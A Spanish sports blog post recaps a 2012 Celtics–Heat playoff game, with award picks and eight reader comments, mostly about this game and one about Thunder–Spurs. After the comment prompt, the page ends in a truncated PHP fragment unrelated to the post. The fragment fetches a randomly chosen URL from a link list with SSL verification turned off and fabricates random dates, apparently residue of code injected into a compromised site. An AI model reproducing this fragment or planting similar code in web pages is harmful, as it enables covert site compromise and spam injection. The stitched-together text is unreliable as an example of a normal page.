La Crónica: 8 flexiones para demostrar que están vivos

02 de June de 2012 por txusma

No hay descanso. Cada día tenemos partido y no nos podemos despistar.

El partido entre Heat y Celtics comenzó igualado. Un Lebron James estelar (16 puntos en el primer cuarto) puso a Miami 6 puntos arriba pero a partir de ese momento, Boston comenzó a carburar de verdad y convirtió esa desventaja en 9 puntos de renta gracias a un parcial de 15-0 entre el final del primer cuarto y el principio del segundo. En medio del vendaval, un Kevin Garnett en su salsa: tras caer de manera un tanto aparatosa bajo la canasta de los Heat y concentrar inmediatamente la atención de sus preocupados compañeros, el 5 de los Celtics nos deleitó con una serie de 8 flexiones de brazo sobre sus nudillos. Estaba perfectamente y lo acabaría de demostrar en lo que quedaba de partido.

A partir de ese momento, monólogo verde hasta el principio del último cuarto que se llegó con 24 puntos de ventaja para Boston. Pero lejos de tirar la toalla, Spoelstra metió en pista un quinteto con Chalmers, Wade, Miller, Battier y Lebron y les ordenó correr y defender fuerte hasta desfallecer. Un parcial de 16-2 con un Mike Miller muy acertado desde la línea de 3 comprimió el partido y dejó entrever la posibilidad de una remontada de los de Florida. Desgraciadamente, una pérdida y un triple fallado por Lebron rompió la racha y los Celtics consiguieron amarrar la victoria manteniendo siempre una ventaja de 8-10 puntos.

PREMIOS

MVP: La pareja Kevin Garnett-Rajon Rondo llevó en volandas a los suyos a la victoria. Garnett acabó el partido con 24 puntos, 11 rebotes y 8 flexiones y Rondo, con 21 puntos, 6 rebotes y 10 asistencias.

Sorpresa: 3 triples de Mike Miller en el último cuarto dieron esperanzas de remontar a los Heat. Además capturó 6 rebote. Algo así esperaban de él cada noche cuando lo ficharon el año pasado con la MidLevel.

Decepción: Shane Battier falló los 6 tiros que intentó y se quedó en 0 puntos. De todas maneras su aportación va mucho más allá de los números.

Esfuerzo en vano: A pesar de su discutible actuación en los últimos minutos, Lebron James fue el mejor de los Heat con 34 puntos, 8 rebotes y 5 asistencias.

Imágenes | AP Photos / Getty Images


Comenta

8 comentarios a esta entrada

  1. Nacho dice:
    #1

    Lo de Rondo es descomunal. Es de los pocos tipos que sabe hacer lo que necesita su equipo. Como se nota que el bueno de Doc está detrás de su estrella. ¡MVP! cantando el TD Garden. De Big Three a Big Four a dentro de poco Big One. A mí me tiene encadilado el chaval, Para las estadísticas que sea Paul el mejor base. Yo siempre haría mi equipo con este tipo. Además es una pura delicia verlo jugar, si hubiese pasado de los 14 a los 17 años en la escuela balcánica no te digo ya cómo sería.
    Volviendo a otra cosa, ayer los Celtics parecían tener 5 años menos. Hasta Allen haciendo una penetración y machacando.
    Si los verdes mantienen cierto tono físico, hay serie.

      Citar

  2. GreenPride dice:
    #2

    Grandes Celtics, pero grandes grandes de verdad. Como dice Nacho por momentos parecía que les habían quitado varios años de encima, defendiendo como leones y atacando el aro.
    Aquí vimos una primera cosa importante, los Celtics no son tan malos pasadores como los Pacers y si LeBron o Battier se quedan con Garnett se lo hacen pagar. KG campó a sus anchas y sembró el terror en la zona de los Heat. Además otro festival de Rondo haciendo de todo y una aportación por fin digna de los suplentes verdes con un renacido para la causa Marquis Daniels haciendo un trabajo muy importante en defensa sobre LeBron (lo que permitió un mejor Pierce en la otra cancha) y en ataque haciendo la “funcion Bradley” de cortar hacia el aro para aprovechar la atención sobre el resto de los jugadores célticos. La verdad, me maravillan estos Celtics y orgulloso de que sean mi equipo de los amores con estos jugadores.
    Los Heat, sin el favor arbitral, no pudieron pisar tanto la pintura y aunque sí metieron canastas de contraataque, Wade notó mucho que no le era tan fácil entrar a canasta.
    Al final y con el partido perdido quinteto a la desesperada con 5 bajitos y remotada a base de triples aunque realmente nunca llegaron a poner en peligro el partido para Boston.
    Y ahora se presenta un partido el domingo realmente interesantísimo. Si los Celtics consiguen mantener el físico y seguir alimentando a KG (para lo que Pierce y Garnett deberán estar acertados como hoy) estoy de acuerdo en que hay serie y aunque lo sigo viendo muy difícil para los Celtics este equipo nunca dejará de sorprenderme así que no los doy todavía por finiquitados.

      Citar

  3. Sancho88 dice:
    #3

    Todo se resume en un montaje que hacen en uno de los tiempos muertos en el último periodo. Ahí se ve lo que hace Rondo aparte de asistir, penetrar, etc. Siempre está mirando a dos sitios a la vez, es decir, se anticipa a la jugada en todos los aspectos y por eso es capaz de robar, hacerle la pirula a Haslem, etc. Un genio del baloncesto, una maravilla. Esteban, te equivocaste con Paul, este sí que puede ser un base de leyenda y lo digo totalmente convencido. Magic, Stockton, Nash, Kidd y ahora Rondo. Qué jodida maravilla!!

    Por otra parte, muy mal los pívots miamenses, no aportaron absolutamente nada, tanto fue así que Spoelstra tuvo que poner un quinteto con todos los pequeños. Boston no permitió correr en ningún momento a los Heat, y éstos no defendieron para nada la pintura… fue un chorreo en toda regla. Sorpresones de Daniels y Dooling, quién lo diría copón!! a estas alturas además…

    Si Rondo consigue seguir con ese nivel y los Celtics siguen por esta línea, la serie puede hacerse muy larga. Me encantaría que esto fuera así, porque no puedo disimular mi simpatía por estos tipos, sobre todo por Rajon Rondo.

      Citar

  4. Sancho88 dice:
    #4

    Txus, ok los triples de Miller, pero ya se lo habíamos visto hacer en la serie contra los Pacers. El gran sorpresón de ayer lo dieron dos tipos totalmente defenestrados como Dooling y Daniels, a mi juicio

      Citar

  5. Lanegan dice:
    #5

    KG, a 2 flexiones del triple doble!

      Citar

  6. nba dice:
    #6

    menudo partido de Durant y cia, Ibaka parecia que se habia reencarnado en K.Garnett, que serie mas emocionante

      Citar

  7. Nacho dice:
    #7

    Partidazo en Oklahoma. Los Thunder de nuevo en juego coral. Con un Ibaka superlativo, un Perkins ¿quién te ha visto y quién te ve? enchufadísimo, y un Durant sideral en el último cuarto, han podido con unos Spurs que ya no parecen el equipazo de hace cuatro días.
    Parece que alguien le chivó al oído al bueno de Scott Brooks que había que jugar con los interiores, que el recurso de Shefolosa del jueves ya no valdría. Las tres primeras posesiones de OKC fueron dos tiros de cinco metros de Perkins (metió 1) y una en la pintura. Luego llegó el huracán Ibaka, 11 de 11, con 5 o 6 tiros de 5-6 metros. Y una magnífica defensa. Aún así los tejanos hacían la goma y llegaron, al inicio del último cuarto, a ponerse a dos puntos. Leonard hizo un partidazo, pero le faltó consistencia a sus estrellas. Al final Duncan hizo buenos números, pero no deja de ser engañoso, durante mucho tiempo estuvo superado por la defensa. Seguro que Popovich tiene recursos, y los de Durant han demostrado saber jugar en equipo. Ayer gris otra vez Westbrook, pero esta vez, sus malas decisiones no lastraron al equipo.

      Citar

  8. Sancho88 dice:
    #8

    Lo de Duncan no fue engañoso ni mucho menos, el problema es que Popo tardó demasiado en sentarlo por Blair y en el tercer cuarto estaba reventado. Puede ser un gran recurso poner a Blair con Diaw para darle descansos. Splitter lamentabilísimo. No tiene nivel para jugar unas finales de conferencia en la NBA. Físicamente endeble, no aprovecha sus centímetros y defensivamente no llega ni a las ayudas… fatal. Lo de Durant es para enmarcarlo, si no me equivoco metió 7 canastas consecutivas en el último cuarto. Imposible de parar

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>